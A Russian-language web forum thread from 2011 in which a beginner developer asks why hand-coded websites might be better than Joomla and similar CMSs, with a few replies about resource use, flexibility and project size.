[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: Рукописный сайт vs готовые CMS
dukman
Уважаемые команда IRBIS-team и профессионалы в сфере web.

Довольно продолжительное время я изучал различные веб технологи, и с недавнего времени начал применять их на практике, но на моем пути встала Joomla, а именно люди использующие её.... Ведь создание сайтов при использовании Joomlа дешевле и гораздо меньше затрачиваешь времени на это.

Хотел бы услышать мнение профессионалов. В чем преимущество рукописных сайтов перед CMS типа Joomla? Как вы относитесь к использованию CMS Joomla и их подобных?

Я задаю эти вопросы ибо потенциальные заказчики отказываются от предлагаемых мною услуг в пользу Joomla, ведь это дешево и быстро.... А я не знаю что ответить на выше заданные вопросы sad.gif

Помогите пожалуйста



Спустя 21 минута, 12 секунд (21.01.2011 - 19:14) Invis1ble написал(а):
dukman
у меня пока нет опыта работы с Joomla, но насколько я знаю по отзывам, основные ее (и ей подобным) минусы - это большое потребление ресурсов и невозможность решать нетривиальные задачи.

Спустя 14 минут, 27 секунд (21.01.2011 - 19:28) inpost написал(а):
dukman
А ты хочешь работать на сайты-визитки или сложные проекты суммой по 10-000 и 20-000 долларов? Если сайты-визитки, то конечно же Joomla =)

Спустя 15 минут, 16 секунд (21.01.2011 - 19:43) dukman написал(а):
Вот именно хочу работать над сложными проектами smile.gif но для начало надо бы учиться с боле простых проектов:) и вот он вроде выплюнулся, но заказчики предпочли боле дешевую джомлу, а я не смог аргументировать в чем преимущество Рукописных сайтов от шаблонных типа джомлы sad.gif

Спустя 1 минута, 47 секунд (21.01.2011 - 19:45) DedMorozzz написал(а):